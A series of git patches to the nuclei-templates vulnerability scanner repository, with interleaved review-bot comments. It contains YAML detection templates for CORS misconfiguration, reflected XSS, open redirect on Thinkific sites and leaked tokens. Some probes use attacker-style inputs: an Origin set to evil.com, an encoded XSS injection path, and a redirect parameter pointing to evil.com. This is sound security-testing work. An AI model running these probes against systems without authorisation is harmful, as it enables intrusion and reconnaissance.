medium + severity: info requests: - method: GET path: - '{{BaseURL}}' +# Notes:- +# This template requires manual inspection once found valid match. +# Generic token could be anything matching below regex. +# Impact of leaked token depends on validation of leaked token. + matchers-condition: and matchers: - type: dsl diff --git a/exposed-tokens/generic/http-username-password.yaml b/exposed-tokens/generic/http-username-password.yaml index 1c7f4d253f..774dfb8497 100644 --- a/exposed-tokens/generic/http-username-password.yaml +++ b/exposed-tokens/generic/http-username-password.yaml @@ -1,13 +1,15 @@ id: http-username-password # Extract something like https://username:password@vulnerable.com -# can be improved info: name: Http usernamme password author: nadino severity: info +# Notes:- +# This template requires manual inspection once found valid match. + requests: - method: GET path: diff --git a/exposures/apis/swagger-api.yaml b/exposures/apis/swagger-api.yaml index 8692b19eae..1c064f5792 100644 
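Review bot: The new `# Notes:-` block in general-tokens.yaml is inserted inside the first request, between `path:` and `matchers-condition:`, whereas the identical block added to credentials-disclosure.yaml in this same commit sits in the file header above `info:`. The text is valid YAML in either position, but a reader scanning the request definition will take a comment there as describing that request rather than the template as a whole; move it up next to the `id:` line so the two files agree. The matchers the note refers to start after the end of this hunk.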
--- a/exposures/apis/swagger-api.yaml +++ b/exposures/apis/swagger-api.yaml @@ -1,4 +1,4 @@ -id: swagger-apis +id: swagger-api info: name: Swagger API Panel diff --git a/misconfiguration/unauthenticated-nacos-access.yaml b/misconfiguration/unauthenticated-nacos-access.yaml index e3f7ffd68d..516f1b6254 100644 --- a/misconfiguration/unauthenticated-nacos-access.yaml +++ b/misconfiguration/unauthenticated-nacos-access.yaml @@ -20,9 +20,9 @@ requests: matchers: - type: regex regex: - - "username" - - "password" - - "totalCount" + - '"username":' + - '"password":' + - '"totalCount":' condition: and part: body - type: status From 1468d8a52c6d10e644b0215e40e283299694a799 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Mon, 11 Jan 2021 12:14:22 +0530 Subject: [PATCH 40/85] matcher updates --- cves/2019/CVE-2019-7219.yaml | 6 +++++- cves/2020/CVE-2020-1943.yaml | 7 ++++++- .../generic}/basic-cors.yaml | 7 +++++-- .../generic}/basic-xss-prober.yaml | 5 +++++ vulnerabilities/generic/top-xss-params.yaml | 4 ++++ .../wordpress-emails-verification-for-woocommerce.yaml | 8 +++++++- 6 files changed, 32 insertions(+), 5 deletions(-) rename {misconfiguration => vulnerabilities/generic}/basic-cors.yaml (66%) rename {misconfiguration => vulnerabilities/generic}/basic-xss-prober.yaml (89%) diff --git a/cves/2019/CVE-2019-7219.yaml b/cves/2019/CVE-2019-7219.yaml index 6fbcfa0e23..fda09ce8cc 100644 --- a/cves/2019/CVE-2019-7219.yaml +++ b/cves/2019/CVE-2019-7219.yaml @@ -19,4 +19,8 @@ requests: - type: word part: header words: - - "/html" + - "text/html" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml index 6f7d1d6a1d..aad7fef922 100644 --- a/cves/2020/CVE-2020-1943.yaml +++ b/cves/2020/CVE-2020-1943.yaml 
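Review bot: The three tightened patterns in unauthenticated-nacos-access.yaml (`'"username":'`, `'"password":'`, `'"totalCount":'`) contain no regex metacharacters, so `type: word` with the same `condition: and` and `part: body` states the check directly and spares a regex compile per response; `- type: word` in place of `- type: regex` and `words:` in place of `regex:` is the whole change. Quoting the key names with the trailing colon is a sound reduction of false positives on pages that merely mention those words, and is worth keeping either way.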
@@ -16,7 +16,12 @@ requests: words: - "" part: body + - type: word words: - - "/html" + - "text/html" part: header + + - type: status + status: + - 200 \ No newline at end of file diff --git a/misconfiguration/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml similarity index 66% rename from misconfiguration/basic-cors.yaml rename to vulnerabilities/generic/basic-cors.yaml index 1ebe0fd57d..ad90becaf5 100644 --- a/misconfiguration/basic-cors.yaml +++ b/vulnerabilities/generic/basic-cors.yaml @@ -3,16 +3,19 @@ id: basic-cors-misconfig info: name: Basic CORS misconfiguration author: nadino - severity: medium + severity: low requests: - method: GET path: - "{{BaseURL}}" headers: - Origin: "https://evil.com" + Origin: https://evil.com + matchers: - type: word words: - "Access-Control-Allow-Origin: https://evil.com" + - "Access-Control-Allow-Credentials: true" + condition: and part: header diff --git a/misconfiguration/basic-xss-prober.yaml b/vulnerabilities/generic/basic-xss-prober.yaml similarity index 89% rename from misconfiguration/basic-xss-prober.yaml rename to vulnerabilities/generic/basic-xss-prober.yaml index 67bfb60449..9647e8df66 100644 --- a/misconfiguration/basic-xss-prober.yaml +++ b/vulnerabilities/generic/basic-xss-prober.yaml @@ -12,6 +12,7 @@ requests: - method: GET path: - "{{BaseURL}}/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e" + matchers-condition: and matchers: - type: word @@ -23,3 +24,7 @@ requests: words: - "text/html" part: header + + - type: status + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/generic/top-xss-params.yaml b/vulnerabilities/generic/top-xss-params.yaml index 88cea7c922..70ec33288b 100644 --- a/vulnerabilities/generic/top-xss-params.yaml +++ b/vulnerabilities/generic/top-xss-params.yaml @@ -29,3 +29,7 @@ requests: words: - "text/html" part: header + + - type: status + status: + - 200 \ No newline at end of file 
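Review bot: Requiring `Access-Control-Allow-Credentials: true` next to the reflected origin in basic-cors.yaml narrows the template to the credentialed case, but the name `Basic CORS misconfiguration` and the info block do not say so; add `description: Flags an arbitrary Origin reflected together with Allow-Credentials true; origin reflection without credentials is not reported.` so users know what a miss means. Separately, both words are exact header strings; a server that emits lowercase header names (HTTP/2 requires that) or `Access-Control-Allow-Credentials:true` without the space would be missed if the engine matches `part: header` case- and whitespace-sensitively, which is worth checking before relying on the stricter matcher.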
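Review bot: The `status: 200` matcher added at the end of basic-xss-prober.yaml, combined with the `matchers-condition: and` added in the file's first hunk, now discards reflections that arrive in non-200 responses; the probe path `{{BaseURL}}/%61%27%22%3e%3c...` is a resource that does not exist on most servers, so the reflection this template hunts for typically shows up in a 404 or 400 error page, and those are exactly the cases filtered out. The identical status matcher is appended to top-xss-params.yaml in this commit. Either drop the status matcher in both files or widen it, e.g. `- 200`, `- 400`, `- 404`, and let the `text/html` header check remain the guard against non-HTML responses.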
diff --git a/vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml b/vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml index 17f447b87c..3038b1d599 100644 --- a/vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml +++ b/vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml @@ -20,4 +20,10 @@ requests: - type: word words: - "wordpress_logged_in" - part: header \ No newline at end of file + part: header + + - type: status + status: + - 401 + - 403 + negative: true \ No newline at end of file From c62dfd2b53b9544fa5440fad37b753d51fccc0d3 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Mon, 11 Jan 2021 12:28:56 +0530 Subject: [PATCH 41/85] adding few from masters --- exposures/files/exposed-alps-spring.yaml | 31 +++++++++++++++++++ vulnerabilities/other/thinkific-redirect.yaml | 24 ++++++++++++++ 2 files changed, 55 insertions(+) create mode 100644 exposures/files/exposed-alps-spring.yaml create mode 100644 vulnerabilities/other/thinkific-redirect.yaml diff --git a/exposures/files/exposed-alps-spring.yaml b/exposures/files/exposed-alps-spring.yaml new file mode 100644 index 0000000000..758b046cc7 --- /dev/null +++ b/exposures/files/exposed-alps-spring.yaml @@ -0,0 +1,31 @@ +id: exposed-alps-spring + +info: + name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS) + author: dwisiswant0 + severity: medium + + # https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ + +requests: + - method: GET + path: + - "{{BaseURL}}/profile" + - "{{BaseURL}}/api/profile" + - "{{BaseURL}}/alps/profile" + matchers-condition: and + matchers: + - type: word + words: + - "_links" + - "/alps/" + - "profile" + condition: and + part: body + - type: word + words: + - "application/hal+json" + part: header + - type: status + status: + - 200 
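Review bot: The write-up URL in exposed-alps-spring.yaml is a bare comment inside the `info:` block, where neither the engine nor reporting tooling can pick it up; the other templates in this series keep such links in the info block's reference list (CVE-2020-7318.yaml in PATCH 35 shows one), so write it as `reference: https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/`. A one-line `description:` saying what the exposed ALPS document reveals would also help triage, since the matcher only proves the document is reachable and served as `application/hal+json`, not what it contains.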
diff --git a/vulnerabilities/other/thinkific-redirect.yaml b/vulnerabilities/other/thinkific-redirect.yaml new file mode 100644 index 0000000000..01d8b2f282 --- /dev/null +++ b/vulnerabilities/other/thinkific-redirect.yaml @@ -0,0 +1,24 @@ +id: thinkific-redirect + +info: + name: Open Redirect vulnerability on thinkific websites + author: Gal Nagli + severity: Medium + + +requests: + - method: GET + + path: + - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com" + + matchers-condition: and + matchers: + - type: status + status: + - 302 + - type: word + words: + - " Date: Mon, 11 Jan 2021 13:03:03 +0530 Subject: [PATCH 42/85] Delete README.md --- README.md | 520 ------------------------------------------------------ 1 file changed, 520 deletions(-) delete mode 100644 README.md diff --git a/README.md b/README.md deleted file mode 100644 index 684ca2b63a..0000000000 --- a/README.md +++ /dev/null 
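Review bot: The thinkific-redirect.yaml added here carries `severity: Medium`, capitalised, while every other template in this series uses lowercase values (`severity: medium` in exposed-alps-spring.yaml in this same commit), so it is likely to trip the same linting the preceding commits were fixing; change it to `severity: medium`, or to `low`, which is how this series rates other open redirects such as aspnuke-openredirect.yaml. The probe also names a real third-party host, `error_url=http://evil.com`; the reserved `http://example.com` is the usual choice for a redirect target in a template that will be run against many sites. The commit title suggests the file was copied from another branch, so it is worth checking it against the latest revision of the template rather than this one. The word matcher at the end of the file is truncated in this copy of the patch, so I cannot check it.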
@@ -1,520 +0,0 @@ - -# Nuclei Templates - -[![License](https://img.shields.io/badge/license-MIT-_red.svg)](https://opensource.org/licenses/MIT) -[![GitHub Release](https://img.shields.io/github/release/projectdiscovery/nuclei-templates)](https://github.com/projectdiscovery/nuclei-templates/releases) -[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/projectdiscovery/nuclei-templates/issues) -[![Follow on Twitter](https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter)](https://twitter.com/pdnuclei) -[![Chat on Discord](https://img.shields.io/discord/695645237418131507.svg?logo=discord)](https://discord.gg/KECAGdH) - -Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list. - -An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. - -### Nuclei templates `v7.3.7` overview - -| Templates | Counts | Templates | Counts | -| ------------------ | -------------------------------- | ------------------------- | --------------------------------------- | -| cves | 147 | files | 0 | -| vulnerabilities | 0 | panels | 0 | -| technologies | 44 | security-misconfiguration | 0 | -| workflows | 17 | tokens | 0 | -| dns | 6 | fuzzing | 6 | -| generic-detections | 0 | default-credentials | 0 | -| subdomain-takeover | 0 | payloads | 0 | -| wordlists | 0 | misc | 0 | - - -### Nuclei templates `v7.3.7` tree overview - -
- Nuclei templates - -``` -├── LICENSE.md -├── README.md -├── cves -│   ├── 2005 -│   │   └── CVE-2005-2428.yaml -│   ├── 2008 -│   │   └── CVE-2008-2398.yaml -│   ├── 2013 -│   │   └── CVE-2013-2251.yaml -│   ├── 2014 -│   │   └── CVE-2014-6271.yaml -│   ├── 2017 -│   │   ├── CVE-2017-10075.yaml -│   │   ├── CVE-2017-11444.yaml -│   │   ├── CVE-2017-12637.yaml -│   │   ├── CVE-2017-14537.yaml -│   │   ├── CVE-2017-14849.yaml -│   │   ├── CVE-2017-5638.yaml -│   │   ├── CVE-2017-7391.yaml -│   │   ├── CVE-2017-7615.yaml -│   │   ├── CVE-2017-9506.yaml -│   │   └── CVE-2017-9841.yaml -│   ├── 2018 -│   │   ├── CVE-2018-0296.yaml -│   │   ├── CVE-2018-1000129.yaml -│   │   ├── CVE-2018-11409.yaml -│   │   ├── CVE-2018-11759.yaml -│   │   ├── CVE-2018-1247.yaml -│   │   ├── CVE-2018-1271.yaml -│   │   ├── CVE-2018-1273.yaml -│   │   ├── CVE-2018-13379.yaml -│   │   ├── CVE-2018-13380.yaml -│   │   ├── CVE-2018-14728.yaml -│   │   ├── CVE-2018-16341.yaml -│   │   ├── CVE-2018-16763.yaml -│   │   ├── CVE-2018-17431.yaml -│   │   ├── CVE-2018-18069.yaml -│   │   ├── CVE-2018-19386.yaml -│   │   ├── CVE-2018-19439.yaml -│   │   ├── CVE-2018-20824.yaml -│   │   ├── CVE-2018-2791.yaml -│   │   ├── CVE-2018-3714.yaml -│   │   ├── CVE-2018-3760.yaml -│   │   ├── CVE-2018-5230.yaml -│   │   └── CVE-2018-7490.yaml -│   ├── 2019 -│   │   ├── CVE-2019-1010287.yaml -│   │   ├── CVE-2019-10475.yaml -│   │   ├── CVE-2019-11248.yaml -│   │   ├── CVE-2019-11510.yaml -│   │   ├── CVE-2019-11580.yaml -│   │   ├── CVE-2019-11581.yaml -│   │   ├── CVE-2019-11869.yaml -│   │   ├── CVE-2019-12314.yaml -│   │   ├── CVE-2019-12461.yaml -│   │   ├── CVE-2019-12593.yaml -│   │   ├── CVE-2019-12725.yaml -│   │   ├── CVE-2019-14322.yaml -│   │   ├── CVE-2019-14696.yaml -│   │   ├── CVE-2019-14974.yaml -│   │   ├── CVE-2019-15043.yaml -│   │   ├── CVE-2019-15107.yaml -│   │   ├── CVE-2019-15858.yaml -│   │   ├── CVE-2019-16278.yaml -│   │   ├── CVE-2019-1653.yaml -│   │   ├── CVE-2019-16662.yaml 
-│   │   ├── CVE-2019-16759-1.yaml -│   │   ├── CVE-2019-16759.yaml -│   │   ├── CVE-2019-16920.yaml -│   │   ├── CVE-2019-17382.yaml -│   │   ├── CVE-2019-17558.yaml -│   │   ├── CVE-2019-18394.yaml -│   │   ├── CVE-2019-19368.yaml -│   │   ├── CVE-2019-19781.yaml -│   │   ├── CVE-2019-19908.yaml -│   │   ├── CVE-2019-19985.yaml -│   │   ├── CVE-2019-20141.yaml -│   │   ├── CVE-2019-2588.yaml -│   │   ├── CVE-2019-2725.yaml -│   │   ├── CVE-2019-3396.yaml -│   │   ├── CVE-2019-3402.yaml -│   │   ├── CVE-2019-3799.yaml -│   │   ├── CVE-2019-5418.yaml -│   │   ├── CVE-2019-6112.yaml -│   │   ├── CVE-2019-6340.yaml -│   │   ├── CVE-2019-6715.yaml -│   │   ├── CVE-2019-7256.yaml -│   │   ├── CVE-2019-7609.yaml -│   │   ├── CVE-2019-8442.yaml -│   │   ├── CVE-2019-8449.yaml -│   │   ├── CVE-2019-8451.yaml -│   │   ├── CVE-2019-8903.yaml -│   │   ├── CVE-2019-8982.yaml -│   │   ├── CVE-2019-9670.yaml -│   │   ├── CVE-2019-9733.yaml -│   │   └── CVE-2019-9978.yaml -│   └── 2020 -│   ├── CVE-2020-0618.yaml -│   ├── CVE-2020-10148.yaml -│   ├── CVE-2020-10199.yaml -│   ├── CVE-2020-10204.yaml -│   ├── CVE-2020-11034.yaml -│   ├── CVE-2020-1147.yaml -│   ├── CVE-2020-11738.yaml -│   ├── CVE-2020-12116.yaml -│   ├── CVE-2020-12720.yaml -│   ├── CVE-2020-13167.yaml -│   ├── CVE-2020-13942.yaml -│   ├── CVE-2020-14179.yaml -│   ├── CVE-2020-14181.yaml -│   ├── CVE-2020-14864.yaml -│   ├── CVE-2020-14882.yaml -│   ├── CVE-2020-15129.yaml -│   ├── CVE-2020-15505.yaml -│   ├── CVE-2020-15920.yaml -│   ├── CVE-2020-16139.yaml -│   ├── CVE-2020-16846.yaml -│   ├── CVE-2020-16952.yaml -│   ├── CVE-2020-17505.yaml -│   ├── CVE-2020-17506.yaml -│   ├── CVE-2020-17518.yaml -│   ├── CVE-2020-17519.yaml -│   ├── CVE-2020-2096.yaml -│   ├── CVE-2020-2140.yaml -│   ├── CVE-2020-23972.yaml -│   ├── CVE-2020-24223.yaml -│   ├── CVE-2020-24312.yaml -│   ├── CVE-2020-2551.yaml -│   ├── CVE-2020-25540.yaml -│   ├── CVE-2020-26214.yaml -│   ├── CVE-2020-3187.yaml -│   ├── CVE-2020-3452.yaml -│   
├── CVE-2020-4463.yaml -│   ├── CVE-2020-5284.yaml -│   ├── CVE-2020-5405.yaml -│   ├── CVE-2020-5410.yaml -│   ├── CVE-2020-5412.yaml -│   ├── CVE-2020-5776.yaml -│   ├── CVE-2020-5777.yaml -│   ├── CVE-2020-5902.yaml -│   ├── CVE-2020-6287.yaml -│   ├── CVE-2020-7209.yaml -│   ├── CVE-2020-7318.yaml -│   ├── CVE-2020-7961.yaml -│   ├── CVE-2020-8091.yaml -│   ├── CVE-2020-8115.yaml -│   ├── CVE-2020-8163.yaml -│   ├── CVE-2020-8191.yaml -│   ├── CVE-2020-8193.yaml -│   ├── CVE-2020-8194.yaml -│   ├── CVE-2020-8209.yaml -│   ├── CVE-2020-8512.yaml -│   ├── CVE-2020-8982.yaml -│   ├── CVE-2020-9047.yaml -│   ├── CVE-2020-9344.yaml -│   ├── CVE-2020-9484.yaml -│   ├── CVE-2020-9496.yaml -│   └── CVE-2020-9757.yaml -├── default-logins -│   ├── apache -│   │   └── tomcat-manager-default.yaml -│   ├── grafana -│   │   └── grafana-default-credential.yaml -│   ├── rabbitmq -│   │   └── rabbitmq-default-admin.yaml -│   └── solarwinds -│   └── solarwinds-default-admin.yaml -├── dns -│   ├── azure-takeover-detection.yaml -│   ├── cname-service-detector.yaml -│   ├── dead-host-with-cname.yaml -│   ├── mx-service-detector.yaml -│   ├── servfail-refused-hosts.yaml -│   └── spoofable-spf-records-ptr.yaml -├── exposed-panels -│   ├── adminer-panel.yaml -│   ├── aims-password-mgmt-client.yaml -│   ├── atlassian-crowd-panel.yaml -│   ├── cisco-asa-panel.yaml -│   ├── citrix-adc-gateway-detect.yaml -│   ├── citrix-vpn-detect.yaml -│   ├── compal-panel.yaml -│   ├── crxde.yaml -│   ├── fortinet-fortigate-panel.yaml -│   ├── fortiweb-panel.yaml -│   ├── github-enterprise-detect.yaml -│   ├── gitlab-detect.yaml -│   ├── globalprotect-panel.yaml -│   ├── go-anywhere-client.yaml -│   ├── grafana-detect.yaml -│   ├── identityguard-selfservice-entrust.yaml -│   ├── iomega-lenovo-emc-shared-nas-detect.yaml -│   ├── jira-detect.yaml -│   ├── jmx-console.yaml -│   ├── manage-engine-admanager-panel.yaml -│   ├── mobileiron-login.yaml -│   ├── netscaler-gateway.yaml -│   ├── 
network-camera-detect.yaml -│   ├── oipm-detect.yaml -│   ├── parallels-html-client.yaml -│   ├── phpmyadmin-panel.yaml -│   ├── polycom-admin-detect.yaml -│   ├── public-tomcat-instance.yaml -│   ├── pulse-secure-panel.yaml -│   ├── rabbitmq-dashboard.yaml -│   ├── rsa-self-service.yaml -│   ├── sap-hana-xsengine-panel.yaml -│   ├── sap-netweaver-detect.yaml -│   ├── sap-recon-detect.yaml -│   ├── solarwinds-orion.yaml -│   ├── sonarqube-login.yaml -│   ├── sonicwall-management-panel.yaml -│   ├── sonicwall-sslvpn-panel.yaml -│   ├── sophos-fw-version-detect.yaml -│   ├── supervpn-panel.yaml -│   ├── tikiwiki-cms.yaml -│   ├── tomcat-manager-pathnormalization.yaml -│   ├── traefik-dashboard.yaml -│   ├── virtual-ema-detect.yaml -│   ├── weave-scope-dashboard-detect.yaml -│   ├── webeditors.yaml -│   ├── webmin-panel.yaml -│   ├── workspace-one-uem.yaml -│   └── workspaceone-uem-airwatch-dashboard-detect.yaml -├── exposed-tokens -│   ├── aws -│   │   ├── amazon-mws-auth-token-value.yaml -│   │   └── aws-access-key-value.yaml -│   ├── generic -│   │   ├── credentials-disclosure.yaml -│   │   ├── general-tokens.yaml -│   │   └── http-username-password.yaml -│   ├── google -│   │   ├── fcm-server-key.yaml -│   │   └── google-api-key.yaml -│   ├── mailchimp -│   │   └── mailchimp-api-key.yaml -│   └── slack -│   └── slack-access-token.yaml -├── exposures -│   ├── apis -│   │   ├── swagger-api.yaml -│   │   ├── wadl-api.yaml -│   │   └── wsdl-api.yaml -│   ├── backups -│   │   ├── sql-dump.yaml -│   │   └── zip-backup-files.yaml -│   ├── configs -│   │   ├── composer-config.yaml -│   │   ├── exposed-svn.yaml -│   │   ├── git-config-nginxoffbyslash.yaml -│   │   ├── git-config.yaml -│   │   ├── htpasswd-detection.yaml -│   │   ├── laravel-env.yaml -│   │   ├── magento-config.yaml -│   │   ├── owncloud-config.yaml -│   │   ├── package-json.yaml -│   │   ├── phpinfo.yaml -│   │   ├── redmine-db-config.yaml -│   │   ├── server-status-localhost.yaml -│   │   ├── 
syfmony-profiler.yaml -│   │   └── web-config.yaml -│   ├── files -│   │   ├── domcfg-page.yaml -│   │   ├── drupal-install.yaml -│   │   ├── ds_store.yaml -│   │   ├── filezilla.yaml -│   │   ├── lazy-file.yaml -│   │   ├── server-private-keys.yaml -│   │   └── xprober-service.yaml -│   └── logs -│   ├── elmah-log-file.yaml -│   ├── error-logs.yaml -│   └── trace-axd-detect.yaml -├── fuzzing -│   ├── arbitrary-file-read.yaml -│   ├── basic-auth-bruteforce.yaml -│   ├── directory-traversal.yaml -│   ├── generic-lfi-fuzzing.yaml -│   ├── iis-shortname.yaml -│   └── wp-plugin-scan.yaml -├── helpers -│   ├── payloads -│   │   ├── CVE-2020-5776.csv -│   │   └── CVE-2020-6287.xml -│   └── wordlists -│   └── wp-plugins.txt -├── miscellaneous -│   ├── basic-cors-flash.yaml -│   ├── dir-listing.yaml -│   ├── htaccess-config.yaml -│   ├── missing-csp.yaml -│   ├── missing-hsts.yaml -│   ├── missing-x-frame-options.yaml -│   ├── ntlm-directories.yaml -│   ├── old-copyright.yaml -│   ├── robots.txt.yaml -│   ├── security.txt.yaml -│   ├── trace-method.yaml -│   ├── unencrypted-bigip-ltm-cookie.yaml -│   ├── wp-xmlrpc.yaml -│   └── xml-schema-detect.yaml -├── misconfiguration -│   ├── aem-groovyconsole.yaml -│   ├── apache-tomcat-snoop.yaml -│   ├── apc-info.yaml -│   ├── aspx-debug-mode.yaml -│   ├── aws-redirect.yaml -│   ├── basic-cors.yaml -│   ├── basic-xss-prober.yaml -│   ├── cgi-test-page.yaml -│   ├── django-debug-detect.yaml -│   ├── docker-api.yaml -│   ├── docker-registry.yaml -│   ├── druid-monitor.yaml -│   ├── drupal-user-enum-ajax.yaml -│   ├── drupal-user-enum-redirect.yaml -│   ├── elasticsearch.yaml -│   ├── exposed-kibana.yaml -│   ├── exposed-service-now.yaml -│   ├── front-page-misconfig.yaml -│   ├── jkstatus-manager.yaml -│   ├── jupyter-ipython-unauth.yaml -│   ├── kubernetes-pods.yaml -│   ├── larvel-debug.yaml -│   ├── linkerd-ssrf-detect.yaml -│   ├── manage-engine-ad-search.yaml -│   ├── php-errors.yaml -│   ├── put-method-enabled.yaml -│   ├── 
rack-mini-profiler.yaml -│   ├── salesforce-aura-misconfig.yaml -│   ├── shell-history.yaml -│   ├── sidekiq-dashboard.yaml -│   ├── springboot-detect.yaml -│   ├── symfony-debugmode.yaml -│   ├── tomcat-scripts.yaml -│   ├── unauthenticated-airflow.yaml -│   ├── unauthenticated-nacos-access.yaml -│   ├── wamp-xdebug-detect.yaml -│   └── zenphoto-installation-sensitive-info.yaml -├── takeovers -│   └── subdomain-takeover.yaml -├── technologies -│   ├── apache-detect.yaml -│   ├── artica-web-proxy-detect.yaml -│   ├── basic-auth-detection.yaml -│   ├── bigip-config-utility-detect.yaml -│   ├── cacti-detect.yaml -│   ├── clockwork-php-page.yaml -│   ├── couchdb-detect.yaml -│   ├── favicon-detection.yaml -│   ├── firebase-detect.yaml -│   ├── google-storage.yaml -│   ├── graphql.yaml -│   ├── graylog-api-browser.yaml -│   ├── home-assistant.yaml -│   ├── jaspersoft-detect.yaml -│   ├── jolokia.yaml -│   ├── kibana-detect.yaml -│   ├── kong-detect.yaml -│   ├── liferay-portal-detect.yaml -│   ├── linkerd-badrule-detect.yaml -│   ├── lotus-domino-version.yaml -│   ├── magmi-detect.yaml -│   ├── mrtg-detect.yaml -│   ├── netsweeper-webadmin-detect.yaml -│   ├── nifi-detech.yaml -│   ├── oidc-detect.yaml -│   ├── pi-hole-detect.yaml -│   ├── prometheus-exporter-detect.yaml -│   ├── prometheus-exposed-panel.yaml -│   ├── prtg-detect.yaml -│   ├── redmine-cli-detect.yaml -│   ├── s3-detect.yaml -│   ├── sap-netweaver-as-java-detect.yaml -│   ├── sap-netweaver-detect.yaml -│   ├── shiro-detect.yaml -│   ├── sql-server-reporting.yaml -│   ├── tech-detect.yaml -│   ├── telerik-dialoghandler-detect.yaml -│   ├── telerik-fileupload-detect.yaml -│   ├── terraform-detect.yaml -│   ├── tomcat-detect.yaml -│   ├── tor-socks-proxy.yaml -│   ├── waf-detect.yaml -│   ├── weblogic-detect.yaml -│   └── werkzeug-debugger-detect.yaml -├── vulnerabilities -│   ├── generic -│   │   ├── crlf-injection.yaml -│   │   ├── top-xss-params.yaml -│   │   └── url-redirect.yaml -│   ├── ibm -│   │   
├── eclipse-help-system-xss.yaml -│   │   └── ibm-infoprint-directory-traversal.yaml -│   ├── jenkins -│   │   ├── jenkins-asyncpeople.yaml -│   │   ├── jenkins-stack-trace.yaml -│   │   └── unauthenticated-jenkin-dashboard.yaml -│   ├── jira -│   │   ├── jira-service-desk-signup.yaml -│   │   ├── jira-unauthenticated-dashboards.yaml -│   │   ├── jira-unauthenticated-popular-filters.yaml -│   │   ├── jira-unauthenticated-projects.yaml -│   │   └── jira-unauthenticated-user-picker.yaml -│   ├── moodle -│   │   ├── moodle-filter-jmol-lfi.yaml -│   │   └── moodle-filter-jmol-xss.yaml -│   ├── oracle -│   │   └── oracle-ebs-bispgraph-file-access.yaml -│   ├── other -│   │   ├── bullwark-momentum-series-directory-traversal.yaml -│   │   ├── cached-aem-pages.yaml -│   │   ├── couchdb-adminparty.yaml -│   │   ├── discourse-xss.yaml -│   │   ├── mcafee-epo-rce.yaml -│   │   ├── microstrategy-ssrf.yaml -│   │   ├── mida-eframework-xss.yaml -│   │   ├── nginx-module-vts-xss.yaml -│   │   ├── nuuo-nvrmini2-rce.yaml -│   │   ├── pdf-signer-ssti-to-rce.yaml -│   │   ├── rce-shellshock-user-agent.yaml -│   │   ├── rce-via-java-deserialization.yaml -│   │   ├── rconfig-rce.yaml -│   │   ├── sick-beard-xss.yaml -│   │   ├── symantec-messaging-gateway.yaml -│   │   ├── tikiwiki-reflected-xss.yaml -│   │   ├── twig-php-ssti.yaml -│   │   ├── vpms-auth-bypass.yaml -│   │   ├── wems-manager-xss.yaml -│   │   └── zms-auth-bypass.yaml -│   ├── rails -│   │   └── rails6-xss.yaml -│   ├── springboot -│   │   ├── springboot-actuators-jolokia-xxe.yaml -│   │   └── springboot-h2-db-rce.yaml -│   ├── vmware -│   │   ├── vmware-vcenter-lfi-linux.yaml -│   │   └── vmware-vcenter-lfi.yaml -│   └── wordpress -│   ├── easy-wp-smtp-listing.yaml -│   ├── sassy-social-share.yaml -│   ├── w3c-total-cache-ssrf.yaml -│   ├── wordpress-accessible-wpconfig.yaml -│   ├── wordpress-db-backup.yaml -│   ├── wordpress-debug-log.yaml -│   ├── wordpress-directory-listing.yaml -│   ├── 
wordpress-emails-verification-for-woocommerce.yaml -│   ├── wordpress-emergency-script.yaml -│   ├── wordpress-installer-log.yaml -│   ├── wordpress-social-metrics-tracker.yaml -│   ├── wordpress-tmm-db-migrate.yaml -│   ├── wordpress-user-enumeration.yaml -│   ├── wordpress-wordfence-xss.yaml -│   └── wordpress-wpcourses-info-disclosure.yaml -└── workflows - ├── artica-web-proxy-workflow.yaml - ├── basic-auth-workflow.yaml - ├── bigip-workflow.yaml - ├── cisco-asa-workflow.yaml - ├── grafana-workflow.yaml - ├── jira-workflow.yaml - ├── liferay-workflow.yaml - ├── lotus-domino-workflow.yaml - ├── magmi-workflow.yaml - ├── mida-eframework-workflow.yaml - ├── netsweeper-workflow.yaml - ├── rabbitmq-workflow.yaml - ├── sap-netweaver-workflow.yaml - ├── solarwinds-orion-workflow.yaml - ├── springboot-workflow.yaml - ├── vbulletin-workflow.yaml - └── wordpress-workflow.yaml -``` - -
-
-**49 directories, 424 files**.
-
-Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding.
-
------
-**Notes:**
-1. Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/)) to validate new templates when sending pull requests.
-2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests.
-
-Thanks again for your contribution and keeping the community vibrant. :heart:
From 2d28f321abe2548a326a6c9e54d487e9ebe43015 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Mon, 11 Jan 2021 13:21:50 +0530 Subject: [PATCH 43/85] Create exposed-alps-spring.yaml --- exposures/configs/exposed-alps-spring.yaml | 34 ++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 exposures/configs/exposed-alps-spring.yaml
diff --git a/exposures/configs/exposed-alps-spring.yaml b/exposures/configs/exposed-alps-spring.yaml
new file mode 100644
index 0000000000..87b140121c
--- /dev/null
+++ b/exposures/configs/exposed-alps-spring.yaml
@@ -0,0 +1,34 @@
+id: exposed-alps-spring
+
+info:
